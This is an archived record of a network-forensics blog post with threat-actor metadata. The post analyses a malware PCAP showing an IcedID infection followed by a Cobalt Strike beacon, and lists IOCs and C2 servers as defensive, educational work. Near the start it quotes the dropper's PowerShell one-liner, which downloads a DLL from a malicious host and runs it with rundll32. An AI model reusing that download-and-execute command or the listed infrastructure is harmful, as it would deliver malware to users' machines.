{ "id": "0ce6131e-12d9-4b2e-9e1b-c35f4564f2fc", "created_at": "2026-04-06T01:29:31.970138Z", "updated_at": "2026-04-10T13:12:08.804526Z", "deleted_at": null, "sha1_hash": "37be476f12b6aeec889357490879bdba0e2c8231", "title": "Analysing a malware PCAP with IcedID and Cobalt Strike traffic", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 246375, "plain_text": "Analysing a malware PCAP with IcedID and Cobalt Strike traffic\r\nBy Erik Hjelmvik\r\nPublished: 2021-04-19 · Archived: 2026-04-06 01:22:10 UTC\r\n, \r\nMonday, 19 April 2021 09:45:00 (UTC/GMT)\r\nThis network forensics walkthrough is based on two pcap files released by Brad Duncan on malware-traffic-analysis.net. The traffic was generated by executing a malicious JS file called StolenImages_Evidence.js in a\r\nsandbox environment.\r\nThe capture file starts with a DNS lookup for banusdona.top, which resolved to 172.67.188.12, followed by an\r\nHTTP GET request for \"/222g100/index.php\" on that domain. The following PowerShell oneliner is returned in\r\nthe HTTP response from banusdona.top:\r\n$path = $Env:temp+'\\JwWdx.dat'; $client = New-Object Net.WebClient;\r\n$client.downloadfile('http://banusdona.top/222g100/main.php',$path); C:\\Windows\\System32\\rundll32.exe\r\n$path,DllRegisterServer\r\nThis oneliner instructs the initial dropper to download a Win32 DLL payload from\r\nhttp://banusdona[.]top/222g100/main.php and save it as \"JwWdx.dat\" in the user's temp directory and then run the\r\nDLL with:\r\nrundll32.exe %TEMP%\\JwWdx.dat,DllRegisterServer\r\nAs you can see in the screenshot below, the HTTP response for this second request to banusdona.top has Content-Type \"application/octet-stream\", but also a conflicting Content-disposition header of\r\n\"attachment;filename=data.jpg\", which indicates that the file should be saved to disk as \"data.jpg\". Nevertheless,\r\nthe \"MZ\" header in the transferred data reveals that the downloaded data wasn't an image, but a Windows binary\r\n(dll or exe).\r\nhttps://netresec.com/?b=214d7ff\r\nPage 1 of 10\n\nImage: CapLoader\r\ntranscript of IcedID malware download\r\nThe downloaded file gets extracted from the pcap file by NetworkMiner as \"data.jpg.octet-stream\".\r\nhttps://netresec.com/?b=214d7ff\r\nPage 2 of 10\n\nImage: Files\r\nextracted from PCAP by NetworkMiner\r\nRight-clicking \"data.jpg.octet-stream\" in NetworkMiner and selecting \"Calculate MD5...\" brings up a new\r\nwindow with additional file details, such as MD5 and SHA hashes of the reassembled file.\r\nMD5: f98711dfeeab9c8b4975b2f9a88d8fea SHA1: c2bdc885083696b877ab6f0e05a9d968fd7cc2bb SHA256:\r\n213e9c8bf7f6d0113193f785cb407f0e8900ba75b9131475796445c11f3ff37c\r\nThis file is available on VirusTotal, where we can see that it's a DLL that several AV vendors identify as \"Cerbu\"\r\nor \"IcedID\". VirusTotal's C2AE sandbox analysis of the DLL also reveals the domain name \"momenturede.fun\" in\r\nthe process' memory. As you might expect, a connection is made to that domain just a few seconds later. A nice\r\noverview of these connections can be seen in CapLoader's Flow tab.\r\nhttps://netresec.com/?b=214d7ff\r\nPage 3 of 10\n\nImage: CapLoader\r\nshowing initial flows from the IcedID malware execution\r\nThe momenturede.fun server returns a 500kB file, which NetworkMiner extracts from the pcap file as\r\n\"index.gzip\".\r\nMD5: 96a535122aba4240e2c6370d0c9a09d3 SHA1: 485ba347cf898e34a7455e0fd36b0bcf8b03ffd8 SHA256:\r\n3d1b525ec2ee887bbc387654f6ff6d88e41540b789ea124ce51fb5565e2b8830\r\nThis turns out to be an encrypted IcedID DLL file, which has been analyzed by Ali Aqeel here:\r\nhttps://aaqeel01.wordpress.com/2021/04/09/icedid-analysis/\r\nRight after the IcedID download we see a series of HTTPS connections towards odd domains like\r\nvaccnavalcod.website, mazzappa.fun, ameripermanentno.website and odichaly.space, all of which resolved to IP\r\n83.97.20.176. That host is most likely a command-and-control (C2) server used by the IcedID malware.\r\nCapLoader's \"Services\" tab also reveals that the TLS connections to port 443 on 83.97.20.176 are very periodic,\r\nwith a new connection every 5 minutes. Periodic connection patterns like this is a typical indicator of C2 traffic,\r\nwhere the malware agent connects back to the C2 server on regular intervals to check for new tasks.\r\nhttps://netresec.com/?b=214d7ff\r\nPage 4 of 10\n\nImage: CapLoader's\r\nServices tab showing that the IcedID malware agent connects to the C2 server every 5 minutes (00:05:01).\r\nThe traffic to 83.97.20.176 is encrypted, so we can't inspect the payload to verify whether or not it is IcedID C2\r\ncommunications. What we can do, however, is to extract the HTTPS server's X.509 certificate and the JA3 hash of\r\nthe client's TLS implementation from the encrypted traffic.\r\nNetworkMiner has extracted the X.509 certificates for vaccnavalcod.website, mazzappa.fun,\r\nameripermanentno.website and odichaly.space to disk as \"localhost.cer\".\r\nhttps://netresec.com/?b=214d7ff\r\nPage 5 of 10\n\nIt turns out that all these sites used the same self-signed certificate, which had SHA1 fingerprint\r\n452e969c51882628dac65e38aff0f8e5ebee6e6b. The X.509 certificate was created using OpenSSL's default\r\nvalues, such as \"Internet Widgits Pty Ltd\" etc. Further details about this certificate can be found on censys.io.\r\nThe JA3 hashes used by the IcedID malware agent can be found in NetworkMiner's Hosts tab as well as in the\r\nParameters tab.\r\nhttps://netresec.com/?b=214d7ff\r\nPage 6 of 10\n\nImage:\r\nNetworkMiner's Parameters tab with keyword filter \"JA3 Hash\"\r\nThe JA3 hashes for the client that connects to the C2 server are a0e9f5d64349fb13191bc781f81f42e1 and\r\n3b5074b1b5d032e5620f69f9f700ff0e. Several legitimate Windows applications unfortunately have the same JA3\r\nhashes, so we can't use them to uniquely identify the IcedID agents.\r\nThe IcedID C2 traffic continues for over 19 hours, at which point we suddenly see a connection to a new\r\nsuspicious domain called \"lesti.net\" on 185.141.26.140. The first HTTP request to that domain is used to\r\ndownload a 261703 byte file, as can be seen in this Flow Transcript from CapLoader:\r\nhttps://netresec.com/?b=214d7ff\r\nPage 7 of 10\n\nNetworkMiner extracts this file as \"9r8z.octet-stream\". This turns out to be a Cobalt Strike beacon download,\r\nwhich we can decode with Didier Stevens' fantastic 1768.py script.\r\nThe output from 1768.py reveals that this Cobalt Strike beacon is using the following URIs for C2\r\ncommunication:\r\nGET URI: http://lesti[.]net/userid=\r\nPOST URI: http://lesti[.]net/update.php\r\nWe can also see that the Cobalt Strike license-id (a.k.a. watermark) is 1580103814. This ID can be used to link\r\nthis Cobalt Strike beacon to other campaigns. Below is a list of Cobalt Strike C2 servers using license-id\r\n1580103814 discovered by Tek in December 2020:\r\n45.147.229[.]157\r\nselfspin[.]com\r\nsavann[.]org\r\npalside[.]com\r\nserver3.msadwindows[.]com\r\nmapizzamates[.]com\r\nfixval[.]com\r\nrackspare-technology[.]download\r\n108.177.235[.]148\r\nmatesmapizza[.]com\r\nUpdate 4 May 2021\r\nhttps://netresec.com/?b=214d7ff\r\nPage 8 of 10\n\nSergiu Sechel published a blog post yesterday, which included a list of Cobalt Strike C2 servers. We fed this list to\r\nTek's scan_list.py script in order to see if license-id 1580103814 is still active. It turned out it was. We found the\r\nfollowing 27 domains and IP's running Cobalt Strike C2 servers on TCP 443 using that license-id.\r\n151.236.14[.]53\r\n151.236.14[.]53\r\n172.241.27[.]70\r\n193.29.13[.]201\r\n193.29.13[.]201\r\n193.29.13[.]209\r\n194.165.16[.]60\r\n193.29.13[.]209\r\n193.29.13[.]201\r\n194.165.16[.]60\r\n194.165.16[.]60\r\ndain22[.]net\r\ndrellio[.]com\r\nfeusa[.]net\r\nfut1[.]net\r\nhelle1[.]net\r\nhars2t[.]com\r\nkasaa[.]net\r\nidxup[.]com\r\nmaren2[.]com\r\nmgfee[.]com\r\nmassflip[.]com\r\noaelf[.]com\r\nrepdot[.]com\r\nscalewa[.]com\r\ntulls[.]net\r\nwellser[.]org\r\nThe full output from our re-scan of Sergiu's C2 list can be found on pastebin.\r\nUpdate 8 May 2021\r\nSecurity researcher Michael Koczwara is tracking Cobalt Strike license 1580103814 as APT actor LuckyMouse\r\n(a.k.a. Emissary Panda or APT 27). Michael's Cobalt Stike C2 dataset, which currently contains 25 unique C2 IPs\r\nand domains for license-id 1580103814, is available as a Google Docs spreadsheet (see the \"LuckyMouse Actor\"\r\ntab).\r\nIndicators of Compromise - IOCs\r\nMD5: 8da75e1f974d1011c91ed3110a4ded38\r\nhttps://netresec.com/?b=214d7ff\r\nPage 9 of 10\n\nSHA1: e9b5e549363fa9fcb362b606b75d131dec6c020e\r\nSHA256: 0314b8cd45b636f38d07032dc8ed463295710460ea7a4e214c1de7b0e817aab6\r\nDNS: banusdona.top\r\nIP: 172.67.188.12\r\nMD5: f98711dfeeab9c8b4975b2f9a88d8fea\r\nSHA1: c2bdc885083696b877ab6f0e05a9d968fd7cc2bb\r\nSHA256: 213e9c8bf7f6d0113193f785cb407f0e8900ba75b9131475796445c11f3ff37c\r\nDNS: momenturede.fun\r\nIP: 104.236.115.181\r\nMD5: 96a535122aba4240e2c6370d0c9a09d3\r\nSHA1: 485ba347cf898e34a7455e0fd36b0bcf8b03ffd8\r\nMD5: 11965662e146d97d3fa3288e119aefb2\r\nSHA1: b63d7ad26df026f6cca07eae14bb10a0ddb77f41\r\nSHA256: d45b3f9d93171c29a51f9c8011cd61aa44fcb474d59a0b68181bb690dbbf2ef5\r\nDNS: vaccnavalcod.website\r\nDNS: mazzappa.fun\r\nDNS: ameripermanentno.website\r\nDNS: odichaly.space\r\nIP: 83.97.20.176\r\nSHA1: 452e969c51882628dac65e38aff0f8e5ebee6e6b\r\nDNS: lesti.net\r\nIP: 185.141.26.140\r\nMD5: 449c1967d1708d7056053bedb9e45781\r\nSHA1: 1ab39f1c8fb3f2af47b877cafda4ee09374d7bd3\r\nSHA256: c7da494880130cdb52bd75dae1556a78f2298a8cc9a2e75ece8a57ca290880d3\r\nCobalt Strike Watermark: 1580103814\r\nNetwork Forensics Training\r\nAre you interested in learning more about how to analyze captured network traffic from malware and hackers?\r\nHave a look at our network forensic trainings. Our next class is a live online event called PCAP in the Morning.\r\nPosted by Erik Hjelmvik on Monday, 19 April 2021 09:45:00 (UTC/GMT)\r\nTags: #Cobalt Strike#CobaltStrike#IcedID#NetworkMiner#CapLoader#Network Forensics#JA3#X.509#1768.py\r\n#a0e9f5d64349fb13191bc781f81f42e1#3b5074b1b5d032e5620f69f9f700ff0e\r\nSource: https://netresec.com/?b=214d7ff\r\nhttps://netresec.com/?b=214d7ff\r\nPage 10 of 10", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://netresec.com/?b=214d7ff" ], "report_names": [ "?b=214d7ff" ], "threat_actors": [ { "id": "610a7295-3139-4f34-8cec-b3da40add480", "created_at": "2023-01-06T13:46:38.608142Z", "updated_at": "2026-04-10T02:00:03.03764Z", "deleted_at": null, "main_name": "Cobalt", "aliases": [ "Cobalt Group", "Cobalt Gang", "GOLD KINGSWOOD", "COBALT SPIDER", "G0080", "Mule Libra" ], "source_name": "MISPGALAXY:Cobalt", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e3492534-85a6-4c87-a754-5ae4a56d7c8c", "created_at": "2022-10-25T15:50:23.819113Z", "updated_at": "2026-04-10T02:00:05.354598Z", "deleted_at": null, "main_name": "Threat Group-3390", "aliases": [ "Threat Group-3390", "Earth Smilodon", "TG-3390", "Emissary Panda", "BRONZE UNION", "APT27", "Iron Tiger", "LuckyMouse", "Linen Typhoon" ], "source_name": "MITRE:Threat Group-3390", "tools": [ "Systeminfo", "gsecdump", "PlugX", "ASPXSpy", "Cobalt Strike", "Mimikatz", "Impacket", "gh0st RAT", "certutil", "China Chopper", "HTTPBrowser", "Tasklist", "netstat", "SysUpdate", "HyperBro", "ZxShell", "RCSession", "ipconfig", "Clambling", "pwdump", "NBTscan", "Pandora", "Windows Credential Editor" ], "source_id": "MITRE", "reports": null }, { "id": "c63ab035-f9f2-4723-959b-97a7b98b5942", "created_at": "2023-01-06T13:46:38.298354Z", "updated_at": "2026-04-10T02:00:02.917311Z", "deleted_at": null, "main_name": "APT27", "aliases": [ "BRONZE UNION", "Circle Typhoon", "Linen Typhoon", "TEMP.Hippo", "Budworm", "Lucky Mouse", "G0027", "GreedyTaotie", "Red Phoenix", "Iron Tiger", "Iron Taurus", "Earth Smilodon", "TG-3390", "EMISSARY PANDA", "Group 35", "ZipToken" ], "source_name": "MISPGALAXY:APT27", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "b399b5f1-42d3-4b53-8c73-d448fce6ab43", "created_at": "2025-08-07T02:03:24.68371Z", "updated_at": "2026-04-10T02:00:03.64323Z", "deleted_at": null, "main_name": "BRONZE UNION", "aliases": [ "APT27 ", "Bowser", "Budworm ", "Circle Typhoon ", "Emissary Panda ", "Group35", "Iron Tiger ", "Linen Typhoon ", "Lucky Mouse ", "TG-3390 ", "Temp.Hippo " ], "source_name": "Secureworks:BRONZE UNION", "tools": [ "AbcShell", "China Chopper", "EAGERBEE", "Gh0st RAT", "OwaAuth", "PhantomNet", "PoisonIvy", "Sysupdate", "Wonknu", "Wrapikatz", "ZxShell", "reGeorg" ], "source_id": "Secureworks", "reports": null }, { "id": "5c13338b-eaed-429a-9437-f5015aa98276", "created_at": "2022-10-25T16:07:23.582715Z", "updated_at": "2026-04-10T02:00:04.675765Z", "deleted_at": null, "main_name": "Emissary Panda", "aliases": [ "APT 27", "ATK 15", "Bronze Union", "Budworm", "Circle Typhoon", "Earth Smilodon", "Emissary Panda", "G0027", "Group 35", "Iron Taurus", "Iron Tiger", "Linen Typhoon", "LuckyMouse", "Operation DRBControl", "Operation Iron Tiger", "Operation PZChao", "Operation SpoiledLegacy", "Operation StealthyTrident", "Red Phoenix", "TEMP.Hippo", "TG-3390", "ZipToken" ], "source_name": "ETDA:Emissary Panda", "tools": [ "ASPXSpy", "ASPXTool", "Agent.dhwf", "AngryRebel", "Antak", "CHINACHOPPER", "China Chopper", "Destroy RAT", "DestroyRAT", "FOCUSFJORD", "Farfli", "Gh0st RAT", "Ghost RAT", "HTTPBrowser", "HTran", "HUC Packet Transmit Tool", "HighShell", "HttpBrowser RAT", "HttpDump", "HyperBro", "HyperSSL", "HyperShell", "Kaba", "Korplug", "LOLBAS", "LOLBins", "Living off the Land", "Mimikatz", "Moudour", "Mydoor", "Nishang", "OwaAuth", "PCRat", "PlugX", "ProcDump", "PsExec", "RedDelta", "SEASHARPEE", "Sensocode", "SinoChopper", "Sogu", "SysUpdate", "TIGERPLUG", "TVT", "Thoper", "Token Control", "TokenControl", "TwoFace", "WCE", "Windows Credential Editor", "Windows Credentials Editor", "Xamtrav", "ZXShell", "gsecdump", "luckyowa" ], "source_id": "ETDA", "reports": null }, { "id": "236429ce-6355-43f6-9b58-e6803a1df3f4", "created_at": "2026-03-16T02:02:50.60344Z", "updated_at": "2026-04-10T02:00:03.641587Z", "deleted_at": null, "main_name": "Bronze Union", "aliases": [ "Circle Typhoon ", "Emissary Panda " ], "source_name": "Secureworks:Bronze Union", "tools": [ "China Chopper", "OwaAuth", "Sysupdate" ], "source_id": "Secureworks", "reports": null } ], "ts_created_at": 1775438971, "ts_updated_at": 1775826728, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/37be476f12b6aeec889357490879bdba0e2c8231.pdf", "text": "https://archive.orkl.eu/37be476f12b6aeec889357490879bdba0e2c8231.txt", "img": "https://archive.orkl.eu/37be476f12b6aeec889357490879bdba0e2c8231.jpg" } }